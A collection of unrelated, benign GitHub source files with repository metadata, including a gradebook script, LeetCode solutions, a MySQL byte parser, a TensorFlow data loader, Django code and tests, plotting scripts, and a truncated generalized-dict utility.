header = ['Programming Assignment', 'Weight', 'Tests', 'Weight', 'Final Exam', 'Weight']
with open('policies.csv', 'w', newline = "") as file:
writer = csv.writer(file)
writer.writerow(header)
writer.writerow(info)
def newSemester(self):
info: list[str] = []
programAssign = int(input("Please enter number of programming assignments (0-6): "))
pWeight = int(input("Total % weights for programming assignments: "))
print("Each programming assignment weight is (%): ", float(pWeight / programAssign))
tests = int(input("Please enter number of tests (0-4): "))
tWeight = int(input("Total % weights for tests: "))
print("Each test weight is (%): ", float(tWeight / tests))
finalExams = int(input("Please enter number of final exams (0-1): "))
info.append(programAssign)
info.append(pWeight)
info.append(tests)
info.append(tWeight)
info.append(finalExams)
if finalExams == 0:
if pWeight + tWeight != 100:
raise ValueError("Relative Weights must add up to 100%")
if finalExams == 1:
fWeight = int(input("Total % weights for final exam: "))
if pWeight + tWeight + fWeight != 100:
raise ValueError("Relative Weights must add up to 100%")
info.append(fWeight)
self.savePolicies(info)
def outputData(self, method:str):
policies = self.readPolicies()
def lastName(student:Student) -> str:
return student.lastName
def id(student:Student) -> int:
return student.studentID
if method == 'Name':
studentsInfo = sorted(self.__students, key=lastName)
elif method == 'ID':
studentsInfo = sorted(self.__students, key=id)
# print(studentsInfo[0])
header0 = ['PA = Programming Assignment']
header1 = ['Student ID', 'First Name', 'Last Name']
for x in range(policies[0]):
header1.append('PA' + str(x + 1))
for x in range(policies[2]):
header1.append('Test' + str(x + 1))
for x in range(policies[4]):
header1.append('Final Exam')
header1.append('Final Score')
with open('Grades_out.csv', 'w', newline = "") as file:
writer = csv.writer(file)
writer.writerow(header0)
writer.writerow(header1)
for student in studentsInfo:
writer.writerow(student.getStudentInfo())
def main():
gb_b = Gradebook()
# policies = gb_b.readPolicies('FA22')
# print(policies)
policies = gb_b.readPolicies()
print(policies)
gb_b.outputData('Name')
if __name__ == "__main__":
main()
|
kathyshe/gradebook-practice
|
gradebook.py
|
gradebook.py
|
py
| 6,949 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3668865617
|
from typing import List
class Solution:
def solve(self, board: List[List[str]]) -> None:
"""
Do not return anything, modify board in-place instead.
"""
def dfs(i,j,m,n):
if not (0 <= i < m and 0 <= j < n) or board[i][j] != 'O':
return
board[i][j] = 'Y'
dfs(i-1,j,m,n)
dfs(i+1,j,m,n)
dfs(i,j-1,m,n)
dfs(i,j+1,m,n)
def map_board(x):
if x == 'Y':
return 'O'
else:
return 'X'
m,n = len(board), len(board[0])
# horizontal borders
for col in range(n):
if board[0][col] == 'O':
dfs(0,col,m,n)
if board[m-1][col] == 'O':
dfs(m-1,col,m,n)
# vertical borders
for row in range(m):
if board[row][0] == 'O':
dfs(row,0,m,n)
if board[row][n-1] == 'O':
dfs(row,n-1,m,n)
for row in range(m):
board[row] = list(map(lambda x: map_board(x), board[row]))
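# Hedged usage example (illustrative board, added for clarity): the inner 'O' region is captured,
# while the 'O' on the bottom border survives because the border DFS marks it first.
if __name__ == "__main__":
    grid = [["X", "X", "X", "X"],
            ["X", "O", "O", "X"],
            ["X", "X", "O", "X"],
            ["X", "O", "X", "X"]]
    Solution().solve(grid)
    print(grid)   # expected: only the border-connected 'O' at grid[3][1] remains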
|
yingzixu15/leetcode
|
src/SurroundedRegions.py
|
SurroundedRegions.py
|
py
| 1,142 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10353230480
|
import struct
class ByteStream(object):
"""A seekable byte stream
Expects a data object that provides integer values, such as a
py3 bytearray or array('B')
"""
def __init__(self, data):
self.index = 0
self.data = data
def read(self, n_bytes=None):
"""Read the requested number of bytes from this packet chain"""
index = self.index
if n_bytes is None:
return self.data[index:]
result = self.data[index:index + n_bytes]
result[n_bytes-1]
self.index += n_bytes
return result
def read_int8(self):
"""Read a 8-bit/one-byte integer from packet"""
result = self.data[self.index]
self.index += 1
return result
def read_int16(self):
"""Read a 16-bit/two-byte integer from packet"""
index = self.index
self.data[index+1] # index error check
self.index += 2
return struct.unpack('<H', self.data[index:index+2])[0]
def read_int24(self):
"""Read a 24-bit/3-byte integer from packet"""
index = self.index
result = self.data[index:index+3]
result[2] # length check
result.append(0)
self.index += 3
return struct.unpack('<I', result)[0]
def read_int32(self):
"""Read a 32-bit/3 byte integer from packet"""
index = self.index
result = self.data[index:index+4]
result[3] # length check
self.index += 4
return struct.unpack('<I', result)[0]
def read_int64(self):
"""Read a 64-bit/8 byte integer from packet"""
index = self.index
result = self.data[index:index+8]
result[7] # length check
self.index += 8
return struct.unpack('<Q', result)[0]
def skip(self, n_bytes):
"""Skip the requested number of bytes in packet"""
self.index += n_bytes
def read_lcb(self):
"""Read length code binary from this packet"""
data = self.data
index = self.index
first = data[index]
if first == 251: # NULL
self.index += 1
return None
if first < 251:
self.index += 1
return first
size = first - 250
if size < 4:
i_bytes = data[index+1:index+size+1]
i_bytes[size-1] # length check
# pad buffer to 4 bytes for struct.unpack
i_bytes.extend([0]*(4 - size))
# consume first byte + size bytes (either 2 or 3)
self.index += size + 1
return struct.unpack('<I', i_bytes)[0]
else:
# size > 250, but not null and not a 2 or 3 byte int
# must be 64-bit integer
i_bytes = data[index+1:index+8+1]
i_bytes[7] # length check
self.index += 8 + 1
return struct.unpack('<Q', i_bytes)
def read_lcs(self):
"""Read a length coded binary from packet"""
data = self.data
first = data[self.index]
self.index += 1
if first < 251:
size = first
elif first == 0xfb: # NULL
return None
elif first == 252:
size = self.read_int16()
elif first == 253:
size = self.read_int24()
elif first == 254:
size = self.read_int64()
if size:
return self.read(size).tostring()
# we try to be atomic here, largely for the compressed protocol
# XXX: pretty this up
def read_n_lcs(self, n_fields):
data = self.data
index = self.index
results = []
append = results.append
while n_fields:
first = data[index]
if first == 251: # NULL
index += 1
n_fields -= 1
append(None)
continue
if first < 251:
index += 1
size = first
else:
size = first - 250
if size < 4:
i_bytes = data[index+1:index+size+1]
i_bytes[size-1] # length check
# pad buffer to 4 bytes for struct.unpack
i_bytes.extend([0]*(4 - size))
# consume first byte + size bytes (either 2 or 3)
index += size + 1
size = struct.unpack('<I', i_bytes)[0]
else:
# size > 250, but not null and not a 2 or 3 byte int
# must be 64-bit integer
i_bytes = data[index+1:index+8+1]
i_bytes[7] # length check
index += 8 + 1
size = struct.unpack('<Q', i_bytes)
data[index+size - 1]
index += size
append(data[index-size:index].tostring())
n_fields -= 1
self.index = index
return results
def read_nullstr(self):
"""Read a null terminated string from this packet"""
data = self.data
index = self.index
self.index = data.index(0x00) + 1
return self.data[index:self.index - 1].tostring()
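# Hedged usage sketch (illustrative bytes, added for clarity): MySQL length-coded integers use the
# first byte as a tag -- values below 251 stand for themselves, 0xfb means NULL, and 0xfc/0xfd/0xfe
# prefix 2-, 3- and 8-byte little-endian integers respectively.
def _example_read_lcb():
    from array import array
    assert ByteStream(array('B', [0x64])).read_lcb() == 100                  # one-byte value
    assert ByteStream(array('B', [0xfb])).read_lcb() is None                 # NULL marker
    assert ByteStream(array('B', [0xfc, 0x10, 0x27])).read_lcb() == 10000    # 2-byte int 0x2710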
|
abg/mysql4py
|
mysql4py/util.py
|
util.py
|
py
| 5,174 |
python
|
en
|
code
| 1 |
github-code
|
6
|
32988415640
|
import numpy as np
from utils.DataProcess import RandomHSV, RandomBlur, RandomResize, RandomFlip, RandomRotate, ResizeOrCropToInputSize, BoxToTensor
import os
import random
import tensorflow as tf
class ImageData():
def __init__(self, input_shape, class_ls, anchor_ls, anchor_mask, reduce_ratio,
hsv_delta, q_delta, resize_scale_range, flip_mode, angle_range, resize_method = "lanczos3", random = True, test_acc_mode = False):
self.random = random
self.test_acc_mode = test_acc_mode
self.random_hsv = RandomHSV(hsv_delta)
self.random_blur = RandomBlur(q_delta)
self.random_resize = RandomResize(resize_scale_range, resize_method)
self.random_flip = RandomFlip(flip_mode)
self.random_rotate = RandomRotate(angle_range)
self.img_box_to_inputsize = ResizeOrCropToInputSize(input_shape, resize_method, random)
self.box_to_tensor = BoxToTensor(input_shape, class_ls, anchor_ls, anchor_mask, reduce_ratio)
def TF_DataPreprocess(self, img, boxes):
if self.random:
img = self.random_hsv(img)
img = self.random_blur(img)
img, boxes = self.random_resize(img, boxes)
img, boxes = self.random_flip(img, boxes)
img, boxes = self.random_rotate(img, boxes)
img, boxes = self.img_box_to_inputsize(img, boxes)
img = tf.dtypes.cast(img, tf.float32)
# img = tf.clip_by_value(img, 0., 255.)
if self.test_acc_mode:
return img / 255., boxes
else:
y_true_0, y_true_1, y_true_2 = self.box_to_tensor(boxes)
return img / 255., (y_true_0, y_true_1, y_true_2) #boxes[:1,...]
def TF_Parser(self, record):
'''
Parser for TFRecordDataset records
'''
img_features = tf.io.parse_single_example(
record,
features = {
'height' : tf.io.FixedLenFeature([], tf.int64),
'width' : tf.io.FixedLenFeature([], tf.int64),
'depth' : tf.io.FixedLenFeature([], tf.int64),
'image_raw' : tf.io.FixedLenFeature([], tf.string),
'boxes_height': tf.io.FixedLenFeature([], tf.int64),
'boxes_weight': tf.io.FixedLenFeature([], tf.int64),
'boxes' : tf.io.VarLenFeature(tf.float32)
}
)
is_jpg = tf.io.is_jpeg(img_features['image_raw'])
image = tf.cond(
is_jpg,
lambda: tf.io.decode_jpeg(img_features['image_raw']),
lambda: tf.io.decode_png(img_features['image_raw'])
)
boxes = tf.sparse.to_dense(img_features['boxes'])
boxes = tf.reshape(boxes, [img_features['boxes_height'], img_features['boxes_weight']])
return image, boxes
def CreateDataset(self, tfrecord_file, batch_size, epochs = 1, shuffle_size = None, train = True, num_parallel_reads = None, num_parallel_calls = None):
# read the TFRecord file(s)
self.dataset = tf.data.TFRecordDataset(tfrecord_file, num_parallel_reads)
# parse the TFRecord examples
self.dataset = self.dataset.map(self.TF_Parser) #.cache()
# data preprocessing pipeline
self.dataset = self.dataset.map(self.TF_DataPreprocess, num_parallel_calls = num_parallel_calls)
# configure epochs, shuffle_size and batch_size
if train:
self.dataset = self.dataset.shuffle(buffer_size=shuffle_size)
self.dataset = self.dataset.batch(batch_size)
#self.dataset = self.dataset.prefetch(buffer_size = batch_size * 1)
if epochs > 1:
self.dataset = self.dataset.repeat(epochs)
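# Hedged companion sketch (not part of the original training code): an Example that TF_Parser above
# can decode must be written with matching feature names and types. The argument names and the
# assumption that `boxes` is a 2-D float numpy array are illustrative, not taken from this repo.
def serialize_example_sketch(encoded_image_bytes, height, width, depth, boxes):
    def _int64(v):  return tf.train.Feature(int64_list=tf.train.Int64List(value=[v]))
    def _bytes(v):  return tf.train.Feature(bytes_list=tf.train.BytesList(value=[v]))
    def _floats(v): return tf.train.Feature(float_list=tf.train.FloatList(value=v))
    feature = {
        'height': _int64(height),
        'width': _int64(width),
        'depth': _int64(depth),
        'image_raw': _bytes(encoded_image_bytes),
        'boxes_height': _int64(boxes.shape[0]),
        'boxes_weight': _int64(boxes.shape[1]),
        'boxes': _floats(boxes.reshape(-1).tolist()),
    }
    return tf.train.Example(features=tf.train.Features(feature=feature)).SerializeToString()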
|
bardenthenry/YoloV3_TF2_Keras
|
utils/ReadDataFromTFRecord.py
|
ReadDataFromTFRecord.py
|
py
| 3,841 |
python
|
en
|
code
| 1 |
github-code
|
6
|
25278816523
|
from django.urls import path,re_path
from . import views
urlpatterns = [
path('',views.dummy),
re_path('new_reg/',views.register,name='register'),
re_path('login/',views.login,name='login'),
path('index',views.index,name='index'),
path('about',views.about, name='about'),
path('contact',views.contact, name='contact'),
path('connect',views.connect, name='connect')
]
|
mukhilvinod/E-cart
|
django_tutorial/products/urls.py
|
urls.py
|
py
| 408 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9773008235
|
import os
import threading
import numpy as np
from scipy.optimize import curve_fit
import matplotlib.pyplot as plt
import pandas as pd
results = {}
sigmas = {}
def gaussian(x, mu, sigma, A):
return A * np.exp(-(x-mu)**2 / (2*sigma**2))
def find_peak(file_path, noise_range, plot=False):
try:
distribution = np.loadtxt(file_path)
x_axis = np.linspace(4383.3411648850003, 7733.3411648850003, 136)
x = np.arange(len(distribution))
noise_mask = (distribution >= noise_range[0]) & (distribution <= noise_range[1])
distribution[noise_mask] = 0
peak = np.argmax(distribution)
mu, sigma = peak, len(distribution) // 10
A = np.max(distribution)
params, _ = curve_fit(gaussian, x, distribution, p0=[mu, sigma, A])
area = np.sum(gaussian(x, *params))
if plot:
plt.plot(x_axis, distribution, 'bo', label='Original Distribution')
plt.plot(x_axis, gaussian(x, *params), 'r', label='Fitted Gaussian')
plt.xlabel('Velocity (Km/s)')
plt.ylabel('Flux (K)')
plt.legend()
plt.show()
# print("mu: ", params[0])
# print("sigma: ", params[1])
# print("A: ", params[2], 'K')
# print("Integrated Flux: ", area, 'K Km/s')
results[file_path] = area
sigmas[file_path] = params[1]
return params[0]
except:
pass
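# Hedged self-test (synthetic, noise-free data, added for illustration): curve_fit should recover
# mu/sigma/A almost exactly here, which is a quick sanity check of the fitting step in find_peak.
def _fit_synthetic_gaussian():
    x = np.arange(136, dtype=float)
    true_params = (60.0, 8.0, 1.5)                   # mu, sigma, A
    y = gaussian(x, *true_params)
    fitted, _ = curve_fit(gaussian, x, y, p0=[50, 10, 1])
    return fitted                                    # expected to be close to (60, 8, 1.5)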
folder_path = 'C:/Users/mathe/OneDrive/Documents/PROJECTUGC2885-2022/CO files-20221207T192945Z-001/CO files/spectra10'
files = [f for f in os.listdir(folder_path) if f.endswith('.txt')]
valid_files = []
for file in files:
file_path = os.path.join(folder_path, file)
try:
data = np.loadtxt(file_path)
if not np.isnan(data).any():
valid_files.append(file_path)  # keep the full path so find_peak can load the file from any cwd
except:
pass
data = np.array(valid_files)
# print(data)
specs = []
threads = []
for d in data:
x = threading.Thread(target=find_peak, args=(d, (-0.03, 0.01), False,))
threads.append(x)
# start all workers first, then wait for them, so the files are actually processed concurrently
for thread in threads:
    thread.start()
for thread in threads:
    thread.join()
print('End processing')
# for r in results:
# print(f"{r}: {results[r]}")
df = pd.DataFrame({'files': results.keys(), 'values': results.values(), 'sigmas': sigmas.values()})
df.to_csv('testfluxes.csv')
print(df)
|
mattcarv/RadioCUBE
|
SingleGaussianFitting.py
|
SingleGaussianFitting.py
|
py
| 2,424 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16016777996
|
from scarf import app
from core import SiteImage, NoImage
from main import page_not_found, PageData
import core
from StringIO import StringIO
from PIL import Image
from flask import send_file
import logging
import base64
import cStringIO
logger = logging.getLogger(__name__)
""" image resizing is implemented via nginx on hosted instances, this stuff is just for dev """
def serve_pil_image(pil_img):
img_io = StringIO()
pil_img.save(img_io, 'PNG', quality=70)
img_io.seek(0)
return send_file(img_io, mimetype='image/png')
def resize(image_string, maxwidth, maxheight):
img = Image.open(image_string)
hsize = img.size[0]
vsize = img.size[1]
factor = 1
if hsize > maxwidth or vsize > maxheight:
hfactor = 1
if hsize > maxwidth:
if vsize < hsize:
hfactor = maxheight / vsize
else:
hfactor = maxwidth / hsize
vfactor = 1
if vsize > maxheight:
if vsize > hsize:
vfactor = maxheight / vsize
else:
vfactor = maxwidth / hsize
if vfactor < hfactor:
factor = vfactor
else:
factor = hfactor
return img.resize((int(hsize * factor), int(vsize * factor)), Image.ANTIALIAS)
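# Hedged alternative sketch (added only to illustrate the intent of the branching above; it is not
# the code path used in production, where nginx does the resizing): a fit-within-box resize usually
# reduces to a single scale factor -- the smaller of the two axis ratios, clamped at 1 so images
# are never upscaled.
def fit_factor(hsize, vsize, maxwidth, maxheight):
    return min(maxwidth / float(hsize), maxheight / float(vsize), 1.0)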
@app.route('/resize/<size>/<img_id>')
def resize_image(size, img_id):
try:
logger.info('resize fallback URL called for imgid {} - {}'.format(img_id, size))
simg = SiteImage.create(img_id)
image_string = cStringIO.StringIO(base64.b64decode(simg.image))
(x, y) = size.split('x')
img = resize(image_string, float(x), float(y))
return serve_pil_image(img)
except (IOError, NoImage, ValueError):
return page_not_found(404)
|
oamike/scarfage
|
scarf/resize.py
|
resize.py
|
py
| 1,777 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4970666838
|
import csv
import matplotlib.pyplot as plt
from datetime import datetime
file_2 = 'data/sitka_weather_2018_simple.csv'
with open(file_2) as f:
reader = csv.reader(f)
header_row = next(reader)
dates, highs, lows = [], [], []
for x in reader:
high = round(((int(x[5]) - 32) * (5/9)),0)
date = datetime.strptime(x[2], '%Y-%m-%d')
low = round(((int(x[6]) - 32) * (5/9)),0)
highs.append(high)
lows.append(low)
dates.append(date)
plt.style.use('seaborn')
# fig, ax = plt.subplots(figsize=(10, 6), dpi=128)
fig, ax = plt.subplots(figsize=(5,3))
ax.plot(dates, highs, c='crimson', alpha=0.6)
ax.plot(dates, lows, c='turquoise', alpha=0.6)
ax.fill_between(dates, highs, lows, facecolor='royalblue', alpha=0.2)
ax.set_title('Daily high and low temperatures of 2018', fontsize = 12)
ax.set_xlabel('Date', fontsize = 10)
fig.autofmt_xdate()
ax.set_ylabel('Temperature (°C)', fontsize = 10)
ax.tick_params(axis='both', which='major', labelsize=8)
plt.show()
fig.savefig('../../outputs/downloading data/sitka_temp.png', bbox_inches = 'tight')
|
RaulMaya/Data-Visualization
|
python_programs/downloading data/sitka_temperatures.py
|
sitka_temperatures.py
|
py
| 1,108 |
python
|
en
|
code
| 0 |
github-code
|
6
|
14911244486
|
import unittest
import time
import ddt
import json
from Public.cogfig import EXECL_PATH
from Interface.test_mock import test_mock_mi
test_send = test_mock_mi()
import math
from Public.read_excel import read_excel
from unittest import mock
wenjian = EXECL_PATH + '\\jekn.xlsx'  # locate the corresponding case file
index_excel = read_excel(wenjian, '指数价')  # the sheet name must match the workbook, so it is kept as-is
# index price from the previous round
last_prices = 9409.9
@ddt.ddt()
class TestClient(unittest.TestCase):
    def test_fail_request(self, test):
        # # instantiate by calling the method; f gets the test_send instance
        # f=test_send.test_send_requestr()
        # # use the return value as the mock
        # f=mock.Mock(return_value='404')
        # # instantiate via the attribute
        # print(type(f))
        # self.assertEqual(f(), '404')
        # index price
        # totals
        sum = 0
        # users whose amount is not 0 are stored in prices
        prices = []
for i in range(len(test)):
if float(test[i]) > 0:
sum += float(test[i])
prices.append(test[i])
num = len(prices)
        # if prices is empty, return 0 right away
        if num == 0:
            return 0
        ## prices holds exactly one value
        elif num == 1:
            global last_prices
            # check whether |current price - previous price| / previous price exceeds 0.25
            if math.fabs(float(prices[0]) - float(last_prices)) / float(last_prices) > 0.25:
                # return the previous price, because the computed index price deviates too much from it
                return last_prices
            else:
                # return the current index price
                return prices[0]
        ## prices holds exactly two values
        elif num == 2:
            # difference between the first and the second price
            dp = float(prices[0]) - float(prices[1])
            # check whether the difference is negative or zero
            if dp <= 0:  # dp <= 0 is the normal case
                # 1. take the absolute value of the difference
                # 2. check whether difference / price 1 > 0.25
                if -dp / float(prices[0]) > 0.25:  # a deviation above 0.25 is abnormal
                    # |price 1 - previous price| <= |price 2 - previous price|
                    if math.fabs(float(prices[0]) - last_prices) <= math.fabs(float(prices[1]) - last_prices):
                        print(prices[0])
                        # return price 1
                        return prices[0]
                    else:
                        # return price 2
                        return prices[1]
                else:
                    # total price / average price
                    index = sum / float(num)
                    print("index price", index)
last_prices= index
return index
else:
#
if dp / float(prices[1]) > 0.25:
                    if math.fabs(float(prices[0]) - last_prices) <= math.fabs(float(prices[1]) - last_prices):
return prices[0]
else:
return prices[1]
else:
return sum / float(num)
        # the list holds three (or more) prices
        avg = sum / float(num)
        # count of abnormal prices
        nums = 0
for i in range(len(prices)):
dv = math.fabs((float(prices[i]) - avg) / avg)
print(dv)
if dv > 0.03:
nums += 1
prices[i] = 0
if nums == 0:
print(nums)
return avg
return self.test_fail_request(prices)
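    # Worked example of the filtering above (numbers are illustrative):
    #   test = [100, 100.5, 104] -> sum = 304.5, avg = 101.5; every price is within 3%
    #   of the average, so 101.5 is returned.
    #   Any price deviating from the average by more than 3% is zeroed and the method
    #   recurses on the remaining prices; if everything gets filtered out, 0 is returned.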
    # # normal values
# def test_1_average_value(self):
# s=1
# while True:
# if s <= 1:
# test = test_send.test_send_requestr()
# # if r_binance
# print(test)
#
# price = self.test_fail_request(test)
    #             print('index value', price)
# if price > 0:
# last_prices = price
# time.sleep(0.5)
# s += 1
# else:
# break
    # the index table price has only one value
@ddt.data(*index_excel.next())
def test_2_to_value(self,data):
s=1
test_list = data['指数价']
while True:
if s <= 1:
test = test_send.test_send_requestr()
                print("split", type(test_list))
                last_list = test_list.split(',')
                print("split", type(last_list))
                price_list = []
                # for each extracted value: if it deviates by more than 0.25, fall back to the previous index price
for i in range(0,len(last_list)):
global last_prices
f=math.fabs(float(last_prices) - float(last_list[i])) / float(last_prices)
print(f)
if f> 0.25:
price_list.append(0)
else:
#last_prices = last_list[i]
price_list.append(last_list[i])
test = mock.Mock(return_value=price_list)
                # # instantiate via the attribute
                test_list = test()
                price = self.test_fail_request(test_list)
                print('index value', price)
time.sleep(0.5)
if float(price)>0:
last_prices = price
s += 1
else:
break
if __name__ == '__main__':
unittest.main()
|
LiuYaowei-Geek/deep
|
test_Case/mock.py
|
mock.py
|
py
| 5,537 |
python
|
zh
|
code
| 1 |
github-code
|
6
|
71484374908
|
S = input()
N = len(S)
non_x = []
s_notx = []
for i, s in enumerate(S):
if s != 'x':
non_x.append(i)
s_notx.append(s)
s_notx = ''.join(s_notx)
if s_notx != s_notx[::-1]:
print(-1)
quit()
if not non_x:
print(0)
quit()
ans = 0
L = len(non_x)
if L % 2 == 0:
left, right = L // 2 - 1, L // 2
else:
left = right = L // 2
left, right = left - 1, right + 1
for i in range(left + 1):
l, r = left - i, right + i
ans += abs((non_x[l + 1] - non_x[l]) - (non_x[r] - non_x[r - 1]))
ans += abs(non_x[0] - (N - non_x[-1] - 1))
print(ans)
|
knuu/competitive-programming
|
atcoder/corp/cf17_qc_c.py
|
cf17_qc_c.py
|
py
| 575 |
python
|
en
|
code
| 1 |
github-code
|
6
|
16669920694
|
from django.contrib.auth import get_user_model
from django.test import TestCase
from ..models import Comment, Follow, Group, Post
User = get_user_model()
class PostModelTest(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.user = User.objects.create_user(username='TestUsername')
cls.author = User.objects.create_user(username='TestAuthor')
cls.group = Group.objects.create(
title='Тестовая группа',
slug='test-slug',
description='Тестовое описание',
)
cls.post = Post.objects.create(
author=cls.user,
text='Тестовый пост',
)
cls.comment = Comment.objects.create(
text='Тестовый комментарий',
author=cls.user,
post_id=cls.post.id
)
cls.follow = Follow.objects.create(
user=cls.user,
author=cls.author
)
    def test_models_Post_have_correct_object_names(self):
        """Check that __str__ works correctly for the Post model."""
post = PostModelTest.post
expected_object_name = post.text[:15]
self.assertEqual(expected_object_name, str(post))
    def test_models_Group_have_correct_object_names(self):
        """Check that __str__ works correctly for the Group model."""
group = PostModelTest.group
expected_object_name = group.title
self.assertEqual(expected_object_name, str(group))
    def test_models_Comment_have_correct_object_names(self):
        """Check that __str__ works correctly for the Comment model."""
comment = PostModelTest.comment
expected_object_name = comment.text
self.assertEqual(expected_object_name, str(comment))
    def test_models_Follow_have_correct_object_names(self):
        """Check that __str__ works correctly for the Follow model."""
follow = PostModelTest.follow
expected_object_name = str(follow.author)
self.assertEqual(expected_object_name, str(follow))
|
Vilenor/hw05_final
|
yatube/posts/tests/test_models.py
|
test_models.py
|
py
| 2,247 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
33087525996
|
import pygame
from speedfighter.utils.app_base import AppBase
from speedfighter.utils.file import File
from speedfighter.utils.path import Path
class SpeedSpeaker(AppBase):
"""
    Speed speaker that plays pre-recorded voice files (numbers, letters, text).
"""
def __init__(self):
super().__init__()
pygame.mixer.init()
pygame.mixer.music.set_volume(1.0)
@property
def is_busy(self) -> bool:
"""
        Whether audio is currently playing.
"""
return pygame.mixer.music.get_busy()
def play_sound(self, file_path: str):
"""
        Play an audio file and block until playback finishes.
        Parameters
        ----------
        file_path : str
            Path to the audio file
"""
if File.exists(file_path):
pygame.mixer.music.load(file_path)
pygame.mixer.music.play()
while pygame.mixer.music.get_busy():
pygame.time.wait(100) # ms
# self._logger.info("Playing...")
# self._logger.info("Finished.")
else:
self._logger.error("Sound file not found. {}".format(file_path))
def speak_number(self, number: int):
"""
        Read a number aloud.
        Parameters
        ----------
        number : int
            The number to read out
"""
file_path = Path.join(
self.project_root_dir_path, "assets/voice/number/{:0=3}.mp3".format(number)
)
self.play_sound(file_path)
def speak_alphabet(self, alphabet: str):
"""
        Read a letter of the alphabet aloud.
        Parameters
        ----------
        alphabet : str
            The letter to read out
"""
file_path = Path.join(
self.project_root_dir_path, "assets/voice/alphabet/{}.mp3".format(alphabet)
)
self.play_sound(file_path)
def speak_text(self, text: str):
"""
        Read a text aloud.
        Parameters
        ----------
        text : str
            The text to read out
"""
file_path = Path.join(
self.project_root_dir_path, "assets/voice/text/{}.mp3".format(text)
)
self.play_sound(file_path)
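# A minimal usage sketch (assumes the mp3 files exist under assets/voice/):
#
#   speaker = SpeedSpeaker()
#   speaker.speak_number(42)      # plays assets/voice/number/042.mp3
#   speaker.speak_text("start")   # plays assets/voice/text/start.mp3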
|
curio184/speedfighter-nft
|
speedfighter/speed_monitor/speed_speaker.py
|
speed_speaker.py
|
py
| 2,159 |
python
|
en
|
code
| 1 |
github-code
|
6
|
3028976536
|
'''
Description: Converts Gen I pokemon sprites to text for pokemonBatch
Author: Soda Adlmayer
Date: 2017.02.26
'''
from PIL import Image
#set filepath
filename = r"C:\Users\Rudi\Documents\SODA\BATCH\pokemonBatch\data\other\sprites\bulbasaur1.png"
#open image
im = Image.open(filename)
width, height = im.size
#set variables
n = 1
list1 = []
list2 = []
#loop rows
while n <= height:
#empty lists
del list1[:]
del list2[:]
#loop columns
for i in range (width):
xy = (i, n)
px = im.getpixel(xy)
#append pixel value to array
list1.append(px)
#choose text value based on pixel value
if list1[i] == 255:
list2.append(' ')
if list1[i] == 170:
list2.append('°')
if list1[i] == 85:
list2.append('±')
if list1[i] == 0:
list2.append('²')
    #write row to text file (the context manager closes the file each time)
    with open("BULBASAUR_frontSprite.txt", 'a') as f:
        print(*list2, sep='', file=f)
    #progress to the next row
    n += 1
|
Pokeconomist/pokemonBatch
|
assets/sprites/image_processor1.py
|
image_processor1.py
|
py
| 963 |
python
|
en
|
code
| 3 |
github-code
|
6
|
5479399707
|
"""
TODO: Merge or improved with pytree in jax.
"""
from collections import defaultdict
import numpy as np
from functools import wraps
from multiprocessing.shared_memory import SharedMemory
from .array_ops import (
squeeze,
unsqueeze,
zeros_like,
repeat,
tile,
shuffle,
take,
share_memory,
concat,
stack,
arr_mean,
to_item,
select_with_mask,
recover_with_mask,
detach,
get_nbytes,
split,
batch_shuffle,
decode_np,
to_two_dims,
to_list,
gather,
reshape,
transpose,
contiguous,
split_dim,
to_item,
to_cpu,
to_cuda,
allreduce,
slice_item,
deepcopy,
)
from .converter import as_dtype, to_np, to_torch, slice_to_range, to_array
from .type_utils import get_dtype, is_list_of, is_dict, is_h5, is_arr, is_num, is_np, is_str
SMM, use_shared_mem = None, False
def create_smm():
global SMM, use_shared_mem
if not use_shared_mem:
from multiprocessing.managers import SharedMemoryManager
use_shared_mem = True
SMM = SharedMemoryManager()
SMM.start()
def delete_smm():
global SMM, use_shared_mem
if use_shared_mem:
use_shared_mem = False
SMM.shutdown()
def replace_empty_with_none(*args):
args = list(args)
for i, x in enumerate(args):
if x is not None and isinstance(x, (list, dict)) and len(x) == 0:
x = None
args[i] = x
return args
def count_none(*args):
ret = 0
for _ in list(args):
if _ is None:
ret += 1
return ret
def get_first_not_none(*args):
for _ in list(args):
if _ is not None:
return _
return None
class GDict:
"""
Generalized Dict(GDict)
Unified interface for dict, single element, HDF5 File.
    A GDict is defined by the grammar:
        GDict = GDict-Final | GDict-List | GDict-Dict
        GDict-Final = any object whose type is not list, tuple, or dict
        GDict-Dict or GDict-List = dict or list of GDict
    Examples:
        1. GDict-Final:
            1) np-array: x = np.zeros(100)
            2) tensor: x = torch.tensor(100)
            3) HDF5 File: x = File('tmp.h5', 'r')
            4) Other python basic elements: string, scalar, object.
        2. GDict-Dict or GDict-List or GDict-Tuple:
GDict-Dict: x = {'0': {'b': np.zeros(100)}}
GDict-List: x = [{'b': np.zeros(100)}, ]
x['0/b'][0] = 1 (x['0/b/0'] is wrong!)
Rules:
1. No '\<>|:&?*"' in any keys (Compatible with filename rules in windows and unix)
'/' is used to separate two keys between two layers.
2. All integer key will be converted to string
3. tuple object will be converted to list
4. key does not contain any index in GDict-Final (See example 3)
5. Rules for converting a GDict object to HDF5
1) any number in keys of GDict-Dict will be converted to 'int_hdf5_' + number
2) For GDict-List, the list will be converted to a dict with key 'list_int_hdf5_' + number
3) GDict-Final:
1) torch.Tensor will be converted to numpy array when is saved as HDF5 File and cannot be recovered.
2) np.array will be saved as h5py.Dataset
3) h5py object will be deep copied.
4) other object will be serialized with pickle
More Examples:
>>> GDict(np.ones(3)).memory
array([1., 1., 1.])
>>> GDict(np.ones(3)).shape
3
>>> d={'a': np.ones([1,1]), 'b': np.ones([2,3])}
>>> GDict(d).memory
{'a': array([[1.]]), 'b': array([[1., 1., 1.],
[1., 1., 1.]])}
>>> GDict(d).shape
{'a': (1, 1), 'b': (2, 3)}
>>> l = [d,d]
>>> GDict(l).memory
[{'a': array([[1.]]), 'b': array([[1., 1., 1.],
[1., 1., 1.]])}, {'a': array([[1.]]), 'b': array([[1., 1., 1.],
[1., 1., 1.]])}]
>>> GDict(l).shape
[{'a': (1, 1), 'b': (2, 3)}, {'a': (1, 1), 'b': (2, 3)}]
"""
def __init__(self, item=None, faster=False, **kwargs):
self.memory = item if faster else self.to_item(item)
self.capacity = getattr(item, "capacity", None)
@classmethod
def _is_final(cls, item):
return not isinstance(item, (list, dict))
@classmethod
def to_item(cls, item):
if isinstance(item, GDict):
return cls.to_item(item.memory)
elif is_dict(item):
